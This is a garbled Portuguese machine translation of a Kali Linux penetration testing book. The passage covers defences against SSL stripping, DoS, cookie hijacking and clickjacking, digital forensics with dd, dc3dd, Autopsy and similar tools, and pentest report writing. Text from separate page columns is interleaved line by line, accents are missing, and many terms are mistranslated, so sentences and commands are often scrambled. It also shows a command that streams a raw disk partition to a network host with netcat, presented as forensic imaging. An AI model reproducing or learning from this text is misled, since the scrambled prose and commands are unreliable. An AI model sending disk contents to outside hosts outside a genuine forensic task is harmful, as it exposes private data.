mais explcito, a questo s vez senhas), tokens, ou integridade de dados e criptografia http://www.gmail.com, Voc vai notar
se resume a confiar na autoridade de certificados. Este como viagens de trnsito que voc est
certificao que emitiu o certificado faz com que seja difcil para um em toda a rede. Ambas as redirecionado para
vlido atacante para roubar a autenticao abordagens requerem compatibilidade https://www.facebook.com e
e legtimo. Para ambientes de necessria para estabelecer com os equipamentos e deve ser https://www.gmail.com. Tira SSL
laboratrio, comum encontrar uma VPN usado por outro usurio. activada correctamente, de modo a quebra o redirecionamento e obriga a
certificados auto-assinados VPNs tm a capacidade de utilizar ser eficaz. vtima a usar a verso no segura do
que os alarmes gatilho da maioria dos mtodos de criptografia, tais como Defesa tira SSL site. Alm disso, ainda mesmo que o
navegadores de Internet mais PPTP, L2TP, SSL e IPSEC. Tira SSL (coberto de Captulo 3, os site no tem uma verso no-seguro,
populares. Esse pop-up irritante que SSL e IPSEC VPNs fornecer ataques lado do servidor, permite que mas tem
usurios se queixam ao acessar sites segurana de nvel superior para a atacantes para tirar ou arrancar um redirecionamento, tira SSL ir
serve como um meio para avisar que guarda de dados em comparao com a parte criptografada de um site e ver interceptar a solicitao HTTP e
a outros protocolos por causa de seu sesso de Internet da vtima, incluindo encaminhar o usurio para HTTPS
autoridade de certificao no uso de protocolos de criptografia forte informaes confidenciais. comum site. Quando a vtima faz isso, o
provvel confivel, e h o risco de um de criptografia. vincular tira SSL com outro ataque, atacante poder ver toda sesso da
ataque MITM. VPNs so fornecidos por ambas as como vtima.
[260] organizaes pblicas e privadas. como um man-in-the-middle, o que Um mtodo para se proteger contra
possvel que o provedor de VPN pode significa hackers ir capturar todo o ataques de strip SSL garantir que os
Captulo 7 ser capaz de analisar o seu trfego, trfego e despir SSL sites no tm
Criptografado Virtual Private Network porque eles so os prestadores de criptografia de modo que tudo visvel uma verso no-seguro de si mesmo
(VPN) uma outra forma de proteo servios confiveis. Portanto, a para trfego sniffing ferramentas do e que no implementar recursos de
contra questo hacker. Cobrimos redirecionamento. Este
man-in-the-middle. Ao criptografar de confiana ainda um conceito este conceito em Captulo 5, Atacar de impediria um ataque sslstrip, porque
todos os dados enviados de e para o muito importante quando se utiliza autenticao, deste livro. no existe a possibilidade de
seu dispositivo uma VPN. Voc deve [261] redireccionamento. Quando um
ao mascarar o seu endereo (IP) perguntar se voc confia no seu vtima atacada, eles simplesmente
Internet Protocol, VPNs criptografadas provedor de VPN para proteger seus Contramedidas defensivas no ser capaz de chegar a um
garantir dados e privacidade. Para se proteger contra ataques de website. Entendemos a partir de
que voc estiver em uma rede que Sua segurana de dados est nas strip SSL, importante entender como um ponto de vista a implementao do
no podem ser monitoradas ou mos do prestador de servios. tira SSL mundo real que isso muito difcil de
gravadas por ningum, exceto Outras tcnicas que podem ser explora uma vtima. O ataque se aplicar. As pessoas so
o fornecedor de VPN. usadas para se defender contra os aproveita de sites redirecionando os utilizado para a digitao de um
VPNs pode usar mtodos de ataques MITM so Acesso mdia usurios a partir de um no- pedido HTTP no-seguro e ser
autenticao forte, como a au- redirecionado automaticamente
tenticao de dois fatores, quando
necessria segurana. Alm disso, Um dos mtodos mais comuns para e tcnicas avanadas de DNS. Pacotes Teardrop. Solues DDoS
muitas empresas no gostaria que os se defender contra DDoS / DoS a A maioria dos ataques de DDoS / DoS Leading / DoS oferecem a capacidade
usurios a pensar o seu site configurao de rede usar endereos IP falsos ou invlidos para monitorar
est em baixo devido a no aceder a dispositivos que podem lidar com ao atacar DDoS internos e externos / ameaas
uma verso segura do site. Portanto, a grande fluxo de pacotes, a capacidade uma organizao. Os administradores DoS.
melhor proteo de detectar anomalias de rede devem implementar Unicast Defesa de Cookies
a partir de lminas SSL educar os padres de comportamento e de Inverter caminho Como discutimos em captulos
usurios sobre como os ataques trfego. Trfego malicioso identificado Encaminhamento (Unicast RPF) em anteriores, biscoito seqestro uma
cibernticos ocorrer para que possam deve ser automaticamente seus roteadores de borda voltados tcnica onde um atacante
identific-los. filtrou-se para evitar a interrupo do para a Internet como uma proteo rouba cookies de sesso. Biscoito
Para alm disso, os mtodos de servio. Ferramentas de fornecedores, mecanismo contra a falsificao de seqestro pode ser derrotado se o seu
defesa esboamos anteriormente tais como balanceadores de carga endereos de origem IP quando usado site est funcionando
contra man-in-the-arbtrio meio e firewalls de aplicativos web, fazer para lanar ataques DDoS SSL / TLS 3.0. Muitos atacantes ir
tambm defender contra ataques de um grande trabalho de deteco e ataques. Unicast RPF considerado ignorar o SSL / TLS, usando uma
strip SSL. A razo para isto tira SSL defesa contra melhores prticas para-virado de combinao de man-
depende de um homem- volumtrica e ataques do tipo de ponta da Internet roteadores, no entanto, ao assegurar a sua
in-the-middle ataque ocorra. aplicao. Ferramentas de segurana e um bom comeo para se defender aplicao web s; in-the-middle ou
Negao de Servio defesa com capacidade de deteco de DoS contra DDoS / DoS. Unicast RPF est ataques tira SSL
A maioria Distribudo ou padro Denial so capazes de reconhecer rede, configurado no tem pginas seguras, ou seja, no
of Service (DDoS / DoS) ferramentas sesso e trfego da camada de nvel de interface em roteadores fornecer um redirecionamento HTTP
esto abertos aplicao, que importado Cisco. Outra empresa fabrica pode ter para HTTPS, ir atenuar
utilitrios de cdigo escrito em C # ou para mitigar riscos de DoS que pode semelhante as formas de ataque.
Java. Foi demonstrado em Captulo 6, existir em todas as camadas da pilha caractersticas em seus roteadores Biscoito seqestro pode trabalhar
ataques na Web, de protocolos. tambm. Quando Unicast RPF est atravs de conexes SSL / TLS, se os
como uma nica pessoa usando uma [262] configurado, no-verificvel atacantes usam
ferramenta de DoS podem ter um ou endereos IP invlidos sero cross-site scripting para enviar cookies
impacto devastador para um negcio Captulo 7 descartados. para seus servidores. Os
limitando o acesso a fontes on-line ou Para se defender contra os ataques Uma tcnica mais recente utilizada desenvolvedores podem mitigar
derrubar um site. Ferramentas DDoS / contnuos e prolongados, muitas para identificar trfego DDoS / DoS esse risco, definindo o Proteger e
DoS so organizaes se voltam para a est alavancando Netflow em HttpOnly Bandeiras na cookies.
anunciado como aplicaes web Provedor de servios de aplicao conjunto com as listas de acesso de Um erro comum sobre segurana de
ferramentas de testes de estresse. DDoS. Um prestador de servio de trnsito a parar o trfego de entrada aplicaes web est assumindo
Embora eles poderiam potencialmente aplicao DDoS trabalha com na rede como desenvolvedores
ser utilizado para que, em muitos seu ISP e as tentativas de parar de bem como a identificao de ataques garantir toda a sesso, em vez de
casos, eles so utilizados para fins DDoS de chegar a sua rede, internos. Comportamento do trfego apenas o portal de autenticao para
nefastos. redirecionando o trfego analisado e qualquer indicao uma web
Ataques DDoS / DoS, na maioria dos longe de sua organizao. Eles fazem que a rede de ver o trfego malicioso aplicao. Quando toda a sesso no
casos requerem hardware isso por meio de protocolos de ir disparar alarmes, como Smurf ou est protegido, um usurio pode,
infraestrutura de rede abusar. roteamento, como BGP eventualmente, ser atacado.
Os desenvolvedores devem garantir pode detectar os scripts no- forense como ns acreditamos que registros. No haveria maneira de
toda a sua aplicao suporta web autorizadas, alertar o usurio do script necessrio ter um plano de reao distinguir essa mudana de um
seguro e criptografado e impedir que o script quando um de seus amador analista de
sesses atravs de SSL / TLS 3.0 de execuo. Os usurios tm a ativos, tais como um servidor web ou erro ou um hacker tentando cobrir
para evitar ser vulnervel a ataques. capacidade de desativar os controles aplicativo, est comprometida. seus rastros.
[263] de script globalmente por recomendado A maioria dos cientistas forenses vai
sesso ou por site. pesquisar outras fontes para um usar dispositivos especializados para
Contramedidas defensivas Os autores deste livro so grandes fs treinamento mais completo como este copiar dados bit a bit. L
Defesa adicional contra bolinho de noscript, no entanto, voc deve tema se estende para alm tambm um software muito
seqestro est disponvel com incentivar as ferramentas disponveis no Kali respeitvel que vai fazer a mesma
populares Aplicao desenvolvedores web para configurar Linux. Forense digital uma rea de coisa. importante que o seu
Delivery Controller (ADC) aparelhos, cabealho X-Frame-Options em crescente interesse em processo ser muito bem
como balanceadores de carga e filtros respostas HTTP para mitigar segurana da informao com muito documentado. A maioria das cpias
de contedo. este risco em aplicaes web. Alm poucas pessoas que conhecem bem. digitais em processos judiciais que
Vendedores populares a serem disso, alguns controlador de entrega importante lembrar-se de trs regras foram expulsos foram removidos
considerados so a Cisco, Bluecoat, de aplicativos a qualquer hora que voc trabalha em devido a um hash de um meio de
Riverbed, Websense, e muitos aparelhos (ADCs), oferecem aos forense digital. armazenamento, como
outros. Muitos desses vendedores administradores a opo de escrever O no cumprimento destas regras far um disco rgido, no combinando
mudar bandeiras de biscoito para scripts personalizados que opinies de vocs parecem amadoras, dados copiados. O hash de um disco
Proteger e HttpOnly. Eles tambm pode ajudar a reduzir esse e, provavelmente, tornar a sua rgido no ir corresponder a um
tambm tm construdo em tcnicas risco. investigao forense, inclusive. contaminado cpia, mesmo que
de decoro para mitigar alguns ataques Alguns sites podem ter razes A primeira regra nunca trabalhar apenas um nico bit modificado.
cross-site scripting. legtimas para executar um script. Isso sobre dados originais. Sempre use Uma partida de hash significa que
Defesa Clickjacking poderia uma cpia. Certifique-se de no fazer extremamente provvel que os dados
Clickjacking estava coberto de ser para carrinhos de compras ou modifique os dados quando voc cria originais, incluindo logs de acesso do
Captulo 5, Atacando de autenticao, outros sites de comrcio eletrnico. uma cpia. No momento em que voc sistema de arquivos, apagados disco
eo [264] toca ou modificar dados originais, de dados
tcnica onde um atacante engana um o caso torna-se intil. Evidncia informaes e metadados uma cpia
usurio a clicar em algo que no seja Captulo 7 adulterado nunca pode ser usado em exata da fonte de dados original.
o que eles acreditam que esto Forense digital qualquer jurdica A segunda regra para forense digital
clicando em. Uma das melhores Kali Linux 1.0 inclui um nmero de prosseguir, independentemente do algo que pode armazenar dados deve
maneiras de proteger contra ferramentas para lidar com requisitos que for encontrado. A razo uma ser
clickjacking , executando a extenso forenses. vez um original modificado, examinado. Em casos famosos
noscript para navegadores Firefox ou Forense a prtica de investigar existe a possibilidade de identificao envolvendo mdia digital, evidncia
Chrome. provas e da verificao dos factos de de provas falsas que podem deturpar crtica tem sido
Isso vai evitar que cdigos no interesse a verdadeira encontrado em uma cmera,
autorizados sejam executados no seu que liga a um incidente. Esta seo incidente. Um exemplo fazer uma gravadores DVR, consoles de
navegador web. Noscript lhe dar uma introduo para o digital mudana que ajusta a hora do sistema videogame, celulares, iPods e outros
dispositivos digitais aleatrias. Se o Uma investigao forense tudo ser interrogado. unidade inserida no sistema, nada
dispositivo tem qualquer capacidade sobre a percepo de ser um Kali Forensics Bota acontecer. possvel que voc pode
de armazenamento de dados de especialista em segurana Kali Linux tem a opo de usar um querer
utilizador, ento validando evidncias ligadas a um Forensics de inicializao. Modo usar a mdia removvel no modo
possvel que o dispositivo pode ser incidente. fcil ser pego procurando forense Kali selecionado forense por mont-lo manualmente.
utilizado em uma investigao bandidos e tirar concluses sobre o quando voc inicializar um sistema Isto d
forense. No descartar que pode ter acontecido com base na com um disco de boot-up Kali, como o o especialista forense controle
um dispositivo de apenas porque opinio. CD ao vivo. Se voc quiser completo do sistema de arquivos e
improvvel. Um sistema de navegao Esta uma das maneiras mais usar Kali como um kit de ferramentas mdia que est sendo
do carro que armazena mapas e rpidas para desacreditar seu de anlise forense, altamente montado no sistema.
msica em cartes SD pode ser usado trabalho. Como um especialista recomendvel manter um Live CD Como dito anteriormente, voc deve
por criminosos para esconder os forense, voc como Kali sempre trabalhar em uma cpia da
dados, assim fornecer provas s deve expor os fatos. Ser que a parte do seu kit de ferramentas. O Kali fonte de dados.
para o uso da Internet baseado em pessoa Alice roubar arquivos de Bob, Vivo CD pode ser obtido como uma importante manter o sistema de
download de tags de msica. ou fez a conta imagem ISO baixado arquivos da cpia intacta assim voc
[265] que foi registrado como o nome de no site da Kali Linux (consulte a pode mostrar que voc no fez
usurio Alice iniciar uma cpia da Captulo 1, sobre a instalao de Kali). modific-lo, bem como de que seus
Contramedidas defensivas conta de usurio Quando botas Kali, passos podem ser recriados. Vejamos
A ltima regra fundamental para Diretrio home do Bob para uma voc vai ver Modo Forensics como como usar as ferramentas
forense digital garantir a documentar unidade USB com XXX nmero de uma das opes seleccionveis. disponvel em Kali copiar e dados de
todas as suas descobertas. srie no timestamp [266] hash.
Todas as provas e etapas utilizadas XXX XXX em data? Veja a diferena? Anlise do Sistema de Arquivos com
para chegar a uma concluso deve O verdadeiro vilo poderia ter roubado Captulo 7 Kali
ser de fcil compreenso para ele de Alice Usando Kali em Modo Forense ajuda ferramenta pode ser usada para fazer
para ser credvel. Mais importante as credenciais de login (usando voc a atingir o seu nmero de uma uma cpia exata de um sistema de
ainda, os seus resultados devem ser mtodos abordados neste livro) e regra de ouro de no arquivos, incluindo excludos e bota
recreatable. Independente roubar dados de Bob enquanto modificar o sistema de arquivos de setores. Em muitos casos, o
investigadores devem chegar posando como Alice. O momento que origem. O disco rgido interno no instrumento usado para criar um
mesma concluso que voc est voc saltar para uma concluso o tocado e no ficheiro de imagem de disco de meios
usando a documentao momento em que seu caso h a automontagem dos discos externos
e tcnicas. Tambm importante que torna-se inconclusivos base na internos. Parties de swap e de ou discos rgidos. Quando dd cria uma
a documentao estabelece um interferncia pessoal. Lembre-se, qualquer outra memria ou cache imagem de disco, ele pode ser
cronograma como um forense parties tambm no so utilizados montado e examinadas
de eventos quando especificidades especialista, voc pode ser solicitado em qualquer forma. outros sistemas. dd pode salvar a
ocorreu e como ocorreu. Todos sob juramento para prestar No modo forense, mdia removvel no imagem de disco em um
cronograma depoimento sobre o que exatamente ser montado automaticamente. Se compartilhamento de rede, se
concluses devem ser documentadas. aconteceu. Quando qualquer coisa um CD ou um polegar necessrio ou um USB
fora de fatos entra o registro, a sua
credibilidade
dirigir to analistas forenses no toque dd if = <media/partition numa vazia> desmontado e deixar o dd ferramenta uma tima ferramenta, ele pode no
no sistema de arquivos local. O de = <image_file> de lidar com as especificidades da ser sempre a melhor ferramenta. Se
prximo exemplo ser Para este exemplo, vamos digitar o unidade. Para fazer isso, execute o voc estiver olhando para clonagem
examinar como usar dd para fazer seguinte comando para fazer uma comando mostrado na imagem um disco inteiro, existem outras
uma cpia de um disco rgido interno. cpia da primeira seguinte: ferramentas populares, como AIMAGE
O primeiro passo partio: A localizao do dispositivo USB foi / ou AIR Imager, que
selecionar uma mquina de destino e dd if = / dev/sda1 of = sda1-image.dd Dev / null /; no entanto, voc pode no vem pr-carregado com Kali, mas
arrancar com o Live CD Kali no modo Isso ir criar um arquivo de imagem escolher qualquer local. so muito populares. importante
forense. que uma cpia exata de nosso sda1 Voc tambm pode salvar a imagem confirmar
Vamos executar o comando sfdisk-l partio para o nosso local diretamente em um compartilhamento ferramentas utilizadas em uma
para exibir as informaes do disco no sistema de arquivos. Espero que voc de rede NFS. Voc pode fazer isso investigao forense aderir a
sistema ver um grande problema com o que usando admissibilidade evidncias padro
estamos realizando anlise. fizemos. Ns apenas quebrou uma o seguinte comando: regulamentos, se existe a
dd uma das ferramentas Linux / Unix das dd if = / dev/sda1 | porto nc possibilidade que a investigao ser
mais comuns usados para copiar nossas regras de ouro de no my_ip_address_to_network_server usado em uma questo jurdica.
sistemas de arquivos. O modificar os dados originais, quando opcional dc3dd
[267] escreveu o arquivo para o nosso No exemplo a seguir, estamos dc3dd o dd ferramenta com
sistema local, o que considerado clonando a partio sda1 para nosso funcionalidades adicionais para
Contramedidas defensivas como modificar os dados. A melhor armazenamento NFS anlise forense. dc3dd pode calcular
A figura anterior mostra cinco prtica escrever o servidor com um endereo IP de um
parties. Divisrias 1, 2, e 5parecem arquivo de imagem para um outro 10.0.0.5: de hash entre a unidade que voc
o mais interessante, uma vez partio sistema de arquivos, como uma dd if = / dev/sda1 | nc 10.0.0.5 est copiando e da unidade de origem
3e 4so listados como vazio. Lembre- partio diferente, compartilhamento [268] em um nvel pouco a pouco.
se, troca de rede, ou um Isso fundamental quando se
parties podem conter informaes Drive USB. Preferncia pessoal do Captulo 7 pretende provar a cpia dos dados
que sobraram de atividades do autor est usando um drive USB, no Existem outras ferramentas que esto que voc est trabalhando
usurio e cache. Se tivssemos entanto, para este disponveis para clonar um sistema de exatamente como o
arrancado com o CD ao vivo em um exemplo, utilizando-se o sistema local arquivos. Recomenda-se o inicial. Isto pode ser realizado atravs
sistema baseado no Windows, aceitvel para fins de teste. dd ferramenta para clonar parties da criao de um hash de o original e
veramos uma partio diferente Para utilizar um drive USB para o especficas, porque construdo em a cpia
estrutura, no entanto, o conceito armazenamento do sistema copiado, Kali ea maioria dos outros para verificar mais tarde uma partida.
global seria a mesma. primeiro voc precisa ligar Sistemas Linux e Unix. O processo Para o prximo exemplo, vamos
O prximo passo decidir qual um grande drive USB em seu sistema. para clonar um sistema pode ser executar o sfdisk-l comando para ver
partio para copiar. Vamos Desde que voc est no modo forense muito demorado, as unidades e
selecionar a primeira partio listados na Vivo dependendo de quo grande a parties disponveis, como mostrado
na imagem anterior como / Dev/sda1. CD, Kali no vai montar a unidade partio que voc est tentando na imagem seguinte:
O uso bsico do dd comando como USB. Normalmente, voc quer deixar copiar. Embora dd O dc3dd comando executado de
segue: o sistema de arquivos uma forma semelhante como o dd
ferramenta. Voc escolhe uma fonte
unidade ou partio, bem como o Kali tem inmeras ferramentas tipos de sistema o volume. O uso mais um exemplo anterior com a ferramenta
destino para salvar a imagem. H forenses construdo em na categoria comum de autpsia como uma dd, como mostrado na imagem
tambm um hash rotulada Forensics. gesto de casos seguinte:
opo. No prximo exemplo, tomamos Aqui esto algumas ferramentas ferramenta para o gerenciamento de [272]
a partio de / Dev/sda2 e copi-lo comumente usadas em Kali, quando anlise de arquivos de imagem.
para uma aplicado a aplicaes web forense: Lembre-se de como ns criamos um Captulo 7
arquivo de imagem chamado Outras ferramentas forenses em Kali arquivo de imagem O primeiro passo carregar um
CopyofDrivedc3dd, juntamente com o chkrootkit usando o dd ferramenta? Autpsia vai Autpsia de imagem como
clculo de um hash utilizando sha256. chkrootkit pode ser executado em nos ajudar a investigar a imagem. mytestimage.dd.
[269] sistemas Linux para determinar se Para executar Autopsy, navegue at Voc ter a opo de definir um valor
rootkits existir no Kali Linux |Forensics |Digital Forensics de hash para o arquivo quando se
Contramedidas defensivas sistema, com base em assinaturas e e selecione utiliza o dd ferramenta.
Este exemplo para fins de processos. Pense nisso como Autpsia. Isso far com que um Voc pode ter Autopsy calcular o valor
demonstrao. Um verdadeiro forense antivrus ou Terminal janela, que ir iniciar a hash. Os autores recomendam o
investigao no iria salvar a imagem antimalware para sistemas Linux. aplicao. clculo
de volta para a mesma unidade. Para executar o chkrootkit, abra um Deixe essa janela aberta e use a seu prprio MD5 checksum. Isto pode
dc3dd lhe dar um cdigo hash Terminal janela e tipo chkrootkit. Este ferramenta por meio de sua interface ser feito usando o md5sum comando
exclusivo para o arquivo de entrada da ir verificar web. Para acessar a web em um arquivo.
unidade copiada quando o sistema operacional local para todos interface, abra um navegador web e [273]
ela completa. os rootkits instalados. navegue at
importante demonstrar a hash da Chkrootkit um programa simples que http://localhost:9000/autopsy. Contramedidas defensivas
cpia coincide exactamente com o pode garantir a sua cpia de Kali no [271] Voc pode pegar o valor que
original. Podemos foi calculado e coloc-lo diretamente na
use o comando sha256sum para infectado. Voc tambm pode Contramedidas defensivas autpsia.
calcular o hash. Se calcularmos o executar chkrootkit em outras Selecionar Novo caso para criar um Autpsia uma plataforma que pode
hash em nosso arquivo distribuies Linux, instalando novo caso. Isto lhe dar o seguinte ajudar a coletar informaes forense
CopyofDrivedc3dd bem como a nossa que nesses sistemas. imagem de exemplo: para documentao
unidade de disco rgido / Dev/sda2, Autpsia Autpsia ir pedir a algumas fins. Quando uma partio est pronta
Vamos ver que eles correspondem. Autpsia uma ferramenta forense perguntas antes de continuar. para ser examinada, voc pode usar
Ns digital de open source que roda em Perguntas incluem definio Autpsia de olhar
pode at mesmo ver a sada da nossa Windows, Linux, OS X, o fuso horrio, entrando no disco especfico, informaes,
cpia dc3dd tambm o mesmo. e outros sistemas Unix. Autpsia pode deslocamentos de tempo entre o seu arquivos raw, e seus metadados do
Desde o hash corresponde, ser utilizado para analisar imagens de sistema de Kali e do sistema arquivo. Autpsia tambm pode
temos confirmado os arquivos so disco e realizar esto investigando, e descries, tais conectar-se ao Instituto Nacional de
exatamente os mesmos para uma uma anlise em profundidade dos como nomes de host. Padres de Software Biblioteca de
investigao forense. sistemas de arquivos, como NTFS, O prximo exemplo usaremos Referncia para comparar
[270] FAT, HFS +, Ext3, UFS, e vrios autpsia para examinar um arquivo de hashes de arquivos conhecidos para
imagem que foi criada no determinar se eles so bons ou maus
Captulo 7 programas.
Binwalk A figura anterior mostra o linha de comando para identificar SQLite Manager.
Muitas vezes, difcil de determinar a administrador baixado um arquivo arquivos Pasco
finalidade de arquivos binrios binrio e tipos. Estes tipos embutidos olhar para [275]
identificados durante renomeou para fazer parecer que ele as estruturas de dados de um
uma investigao forense. A razo o estava vindo de um fornecedor determinado formato de arquivo, Contramedidas defensivas
cdigo-fonte para arquivos binrios diferente (FW_WRT54G permitindo que Bisturi
normalmente um roteador Linksys). Binwalk foi para uma recuperao mais confivel Scalpel um utilitrio escultura
no disponvel. Binwalk uma capaz de analisar o arquivo e alerta e mais rpido. arquivo que procura um banco de
ferramenta de anlise de firmware que o arquivo um Pasco uma ferramenta forense para dados de cabealho do arquivo
projetado para auxiliar na anlise, Sercom firmware arquivo, mesmo que ler o index.dat arquivos que so conhecidos e
extrao, e engenharia reversa de o arquivo foi renomeado para o criados pela Microsoft assinaturas de rodap, e as tentativas
imagens de firmware e outros formato Linksys. Internet Explorer. O Internet Explorer de esculpir arquivos uma imagem de
softwares binrio. pdf-parser index.dat arquivos armazenam disco. Isto feito pela
O foco Binwalk arquivos binrios de pdf-analisador usado para analisar e navegador do usurio configurar o scalpel.conf arquivo com
firmware, no entanto, existem analisar Portable Document Format histria, que pode ser til para uma o tipo (s) arquivo que voc gostaria de
atualizaes localizadas (PDF) investigao de um host. Microsoft localizar
para redes domsticas e de documentos, bem como extrato de armazena o antes de lan-lo contra um banco de
equipamentos sem fio, bem como informao em bruto, tais como index.dat apresentar em vrios locais dados.
outro consumidor cdigo, imagens, e outros no disco rgido do sistema host. Por bulk_extractor pode extrair uma
aparelhos eletrnicos. elementos de documentos PDF. exemplo, variedade de coisas a partir de uma
Binwalk tem algumas opes uma ferramenta utilizada para analisar alguns index.dat arquivos esto em imagem, incluindo carto de crdito
diferentes que podem ser encontrados e desconstruir PDF pasta pessoal do usurio usada para o nmeros, nmeros de telefone, URLs,
em: https://code.google. documentos que so identificados perfil do usurio. e-mails. bulk_extractor tambm pode
com / p / binwalk / wiki / Uso. Voc como possivelmente ter cdigo Pasco s funciona para o Internet gerar
pode executar o comando binwalk malicioso. Explorer. Outros navegadores como Wordlists a partir de uma imagem que
com o nome do arquivo Principal Firefox e pode ser usada em ataques de
do arquivo binrio que voc gostaria Acima de tudo um utilitrio de Chrome no deixe arquivos de dicionrio. bulk_extractor
de examinar. O prximo exemplo usa escultura de dados usado para index.dat. pode levar vrias horas para ser
binwalk em um recuperar arquivos com base em seus Firefox e Chrome informaes executado, mas os dados que
firmware binrio para um roteador sem cabealhos, navegador do armazenamento em extrado valeu a pena esperar
fio em casa, como mostrado na rodaps e estruturas de dados bancos de dados SQLite. para uso em medicina forense.
imagem seguinte: internas. Acima de tudo funciona com O local da base de dados varia de bulk_extractor
Binwalk resultados sada do arquivo arquivos de imagem, tais como os sistema operacional para operao Resumo
binrio: gerado pela dd, Safeback, Encase, ou sistema, mas eles podem ser abertos fundamental que a segurana
[274] diretamente na unidade. Os com qualquer visualizador SQLite. Um considerada durante todo o ciclo de
cabealhos de arquivo de imagem e dos vida de todos os recursos
Captulo 7 rodaps pode ser especificado por um ferramentas favoritas do autor para que so importantes para as
arquivo de configurao ou usando clientes SQLite um plugin do Firefox operaes comerciais. Nossa meta
chamado para escrever este livro para alm
apoiar um verificador da penetrao [276] encontrar um estilo consistente, os estilos e fluxos adequados associados
educar leitores sobre vrios mtodos; autores deste livro recomendam A com auditorias tcnicas. Isto inclui a
malicioso Ensaio de Penetrao Modern Language indstria
os usurios podem comprometer um Relatrio Executivo Association of America Style, ou normas que vm de organizaes
recurso, para que os administradores Antes de comearmos, queremos melhor conhecido como MLA. MLA especficas PCI e outro setor, como
podem melhorar a sua segurana destacar neste captulo toques sobre um fcil de usar COBIT eo ITIL. Em ltima anlise, o
defesas. Todo mundo um alvo, e temas de estilo de escrita, usado pela maioria tema de seu relatrio seguir o aceite
cabe ao proprietrio de ativos para escrever relatrios, clusulas e das escolas de ensino mdio como padres de governana corporativa
investir o bom acordos. Estes exemplos devem ser um padro de escrita. H. Ramsey para a organizao que voc est
tempo e recursos para a reduo do utilizados como general Fowler auditando. Alm disso, mantenha
risco de ser comprometida. diretrizes. De nenhuma maneira e Jane E. Aaron guia de referncia, em mente que um relatrio penetrao
Este captulo serve como um meio estamos advoga ter conhecimentos ou com o ttulo A Little, Brown Handbook, ser visto por muitas pessoas, e
para se defender contra ataques tcnicas que poderiam um excelente referiu-se por um
apresentados no anterior ser aceito de forma legal. Apesar de guia de referncia sobre como usar perodo mais longo de tempo do que
captulos. Deve-se supor que as sete dos nossos perfis do Facebook, corretamente estilos MLA quando voc provavelmente pretendia.
ferramentas utilizadas nos captulos sendo advogados, escreve. Como Penetrao Os clientes querem saber como eles
anteriores pode ser e sendo fs de Boston Legal, no Tester, e, finalmente, como um so vulnerveis, e os requisitos para
aproveitados para verificar somos Denny Crane. Recomendamos auditor, o valor que voc fornecer corrigir falhas
vulnerabilidades em seus prprios quando voc sero julgados em como para que eles reduzam o risco global
sistemas. Os tpicos abordados neste levar a srio sobre o desenvolvimento suas concluses so apresentadas. A de segurana contra ataques.
captulo includo como clonar uma de escopos, contratos e relatrios, razo nmero um relatrios de teste Formatao e tom de
aplicao web para evitar sistemas voc procura profissional de penetrao falhar um relatrio pode causar uma reao
ativos de teste, ajuda legal. m gramtica ou ortografia. O positiva ou negativa aos dados. Os
padres de segurana da linha de Os engenheiros de rede instalao de nmero dois motivo de fluxo ou trabalhos podem ser rescindido
base, e defesa contra tpicos de redes, programadores criar aplicaes estilos ilgico. Que por ter sido ligado a uma
captulos anteriores. e auditores por isso que altamente vulnerabilidade. Em contrrio, uma
Esses temas incluem senhas, ataques escrever. Como um verificador da recomendvel ter o seu relatrio lacuna crtica na segurana poderia
man-in-the-middle, striping SSL, DoS, penetrao da rede, voc est, por revisado com indivduos no ser
roubar cookies, e clickjacking. Este padro, um auditor. Ao contrrio de relacionado com o seu projeto para ignorado se a linguagem de um
captulo tambm inclui uma seo um fornecer uma perspectiva outsider. relatrio no corretamente destacar
dedicada rede engenheiro que ir configurar Isto pode incluir ter como essencial uma correo
sobre o uso de Kali Linux para protocolos de roteamento, ou um colaboradores que no so tcnicos. necessrio. Os melhores prestadores
investigaes forenses. programador que vai de servios pode equilibrar as
O prximo captulo ir cobrir as criar um aplicativo, o seu valor ser Penetration Test Relatrio Executivo competncias tcnicas e de negcios
melhores prticas para a entrega de baseado em sua escrita. Em outras Como voc apresentar resultados ser no desenvolvimento de relatrios
Teste de Invaso palavras, aprender o fator mais influente e determinante executivos para que o resultado final
servios, incluindo mtodos para como escrever. No uma cincia e para futuros negcios. Uma vez que ter um impacto positivo
desenvolver as entregas dos clientes arte associada com a escrita. Se voc voc se familiarizar com um estilo de liderana e equipe tcnica.
profissionais. est tentando escrita, h mais
Um bom ponto de partida olhar para manuteno da engrenagem H muitos padres importantes da
o que os regulamentos, normas e existente, bem como manter-se com a As linhas de base: Eles so usados indstria que seus clientes esto
mandatos so mais recente tecnologia. Um simples para criar um nvel mnimo de mandatados para
importante para o seu cliente. analogia quando a maioria das segurana necessrio seguir. A lista a seguir comumente
Misturando os requisitos do cliente pessoas compra um laptop, eles atender s exigncias polticas. As usado para justificar a aquisio de
solicitado com a indstria olham para o software para instalar linhas de base pode ser financiamento para
mandatos o primeiro tpico deste para a funcionalidade em vez de configuraes, arquiteturas, ou produtos e servios:
captulo. Em seguida, vamos olhar defesa (ou seja, a compra de procedimentos que podem ou no Seguro de Sade Portabilidade e
para o servio diferente Microsoft Word, em vez refletem o processo de negcio, mas Accountability Act (HIPAA): Requer
modelos utilizados para cobrar por do que um antivrus). Quando esse pode ser que controles adequados so postas
servios de entrega. Depois disso, mesmo laptop infectado, os usurios adaptado para atender a essas em prtica para garantir as operaes
vamos nos concentrar em diferentes parar de pensar exigncias. Voc pode usar linhas de de cuidados de sade
tipos de documentos, formatao de software sobre funcional e priorizar a base como uma abstrao e sistemas de informao
relatrios executivos para que voc obteno de software de segurana para desenvolver padres. administrativos proteger
possa deixar o bom para remover o Padres: So requisitos obrigatrios individualmente identificveis
engajamento ps impresso servio. aplicativo malicioso. que suportam de nvel superior informaes de sade eletrnico. H
Este captulo ser concludo com [278] polticas. Um padro pode exigir a um baixo risco de multas associadas a
alguns exemplos utilizao de uma tecnologia HIPAA no conformidade, no entanto,
relatrios e cobrir as ferramentas de Captulo 8 especfica incluindo os riscos colaterais significativos,
relatrios restantes disponveis em Um mtodo para elevar os seus marca, produto e protocolo. Um como
Kali Linux. servios para o topo da lista de exemplo a criao de um padro responsabilidade civil e marca dano
Observncia prioridade de compra para 802.1x pode resultar de no cumprir HIPPA
Os clientes tm oramentos limitados alinhando com mandatos de negcios. usando o Cisco Identity Services requisitos.
e, normalmente, a segurana no Os clientes so mais propensos a Engine a partir de uma linha de base Federal Information Processing
um gasto superior comprar servios de ter que ter uma forma Standards (FIPS): So computadores
objetivo em relao a compra pr- cumprimento das obrigaes automatizado de controle de acesso. nos EUA
ativa. Em nossa experincia, os empresariais, tornando a conversa Diretrizes: So recomendaes em normas de segurana desenvolvidas
clientes gastaro investimento mais fcil de justificar. vez do que o necessrio. Considerar para proteger a informao transmitida
